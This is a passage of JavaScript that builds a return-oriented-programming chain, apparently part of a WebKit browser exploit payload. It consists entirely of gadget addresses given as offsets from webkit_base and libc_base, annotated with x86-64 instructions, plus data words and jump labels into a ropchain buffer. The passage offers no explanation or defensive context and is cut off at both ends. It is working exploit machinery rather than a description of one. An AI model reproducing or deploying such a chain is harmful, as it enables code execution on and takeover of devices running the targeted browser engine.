webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+433656, //L9200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9199: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9201: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+433840, //L9203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+433856, //L9204 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+433824, //L9202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9202: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9204: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+434016, //L9209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+434032, //L9210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+433968, //L9206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9206: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9207: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L9208: db([1, 0]); // 0x1 set_gadget(webkit_base+3236123,); //pop r9 //L9209: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9210: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+434152, //L9211+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+434144, //L9211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9211: db([0, 0]); // 0x0 set_gadgets([ ropchain+434168, //L9211+24 ropchain+436376, //L9205 libc_base+764760, //pop rsi ropchain+434208, //L9212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9212: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9214: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add 
rax, rsi libc_base+764760, //pop rsi ropchain+434328, //L9217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+434312, //L9215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9215: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9217: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+434408, //L9218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+434424, //L9219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9218: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9219: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+434584, //L9223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+434552, //L9221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+434568, //L9222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9220: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9221: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9222: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9223: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+434640, //L9225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9225: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+434768, //L9227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+434784, //L9228 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+434752, //L9226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9226: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9227: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9228: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+434944, //L9232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+434912, //L9230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+434928, //L9231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9229: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9230: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9231: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9232: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+435000, //L9234 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9234: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+435128, //L9236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+435144, //L9237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+435112, //L9235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9235: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9236: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9237: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, 
edi libc_base+764760, //pop rsi ropchain+435304, //L9241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+435272, //L9239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+435288, //L9240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9238: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L9239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9241: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+435360, //L9243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L9243: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+435488, //L9245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+435504, //L9246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+435472, //L9244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9244: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9245: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9246: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+435584, //L9247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+435600, //L9248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9247: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9248: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi 
libc_base+764760, //pop rsi ropchain+435696, //L9250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+435680, //L9249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9249: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9250: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+435776, //L9251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9251: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9252: db([100, 0]); // 0x64 set_gadget(libc_base+144605,); //pop rdi //L9253: db([100, 0]); // 0x64 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+435920, //L9254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+435952, //L9256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+435936, //L9255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9254: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9255: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9256: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+436120, //L9258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+436136, //L9259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+436104, //L9257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9257: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9259: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+436280, //L9262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+436296, //L9263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+436248, //L9260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9260: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9261: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L9262: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9263: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+436368, //L9264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9264: db([0, 0]); // 0x0 //L9205: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+436496, //L9267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+436512, //L9268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+436480, //L9266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9266: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9267: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9268: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+436624, //L9270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+436672, //L9273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+436640, //L9271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9270: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9271: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9272: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9273: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+436784, //L9274+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+436776, //L9274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9274: db([0, 0]); // 0x0 set_gadgets([ ropchain+436800, //L9274+24 ropchain+466456, //L9269 libc_base+764760, //pop rsi ropchain+436840, //L9275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9275: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9277: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+436960, //L9280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+436944, //L9278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9278: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9280: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, 
//pop rsi ropchain+437136, //L9283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+437152, //L9284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+437104, //L9281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+437120, //L9282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9281: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9282: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9283: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9284: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+437248, //L9286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+437232, //L9285 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9285: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9286: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9287: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L9288: db([9, 0]); // 0x9 set_gadget(libc_base+763368,); //pop rcx //L9289: db([9, 0]); // 0x9 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+437448, //L9291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9291: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+437504, //L9292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9292: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+437640, //L9296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+437624, //L9295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9294: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9295: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9296: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+437776, //L9299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+437808, //L9301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+437760, //L9298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9298: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9299: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9300: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9301: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+437920, //L9302+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+437912, //L9302 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L9302: db([0, 0]); // 0x0 set_gadgets([ ropchain+437936, //L9302+24 ropchain+444912, //L9297 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9303: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9305: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+438072, //L9308 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+438056, //L9306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9306: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9308: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+438232, //L9312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+438184, //L9309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+438200, //L9310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9309: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9310: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9311: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L9312: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+438288, //L9313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9313: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9315: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+438408, //L9316 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+438424, //L9318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9316: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9318: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+438512, //L9319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+438528, //L9321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9319: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9321: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9322: db([4294967240, 4294967295]); // -0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L9324: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+438688, //L9327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+438672, //L9325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9325: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9327: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+438864, //L9330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+438880, //L9331 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+438832, //L9328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, 
//pop rsi ropchain+438848, //L9329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9328: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9329: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9330: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9331: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+438976, //L9333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+438960, //L9332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9332: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9333: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+439056, //L9334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9334: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9336: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+439176, //L9339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+439160, //L9337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9337: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9339: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+439352, //L9342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+439368, //L9343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, 
//pop rsi ropchain+439320, //L9340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+439336, //L9341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9340: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L9341: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9342: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9343: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+439464, //L9345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+439448, //L9344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L9344: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9345: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+439544, //L9346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9346: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9348: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+439664, //L9351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+439648, //L9349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9349: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9351: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+439840, //L9354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, 
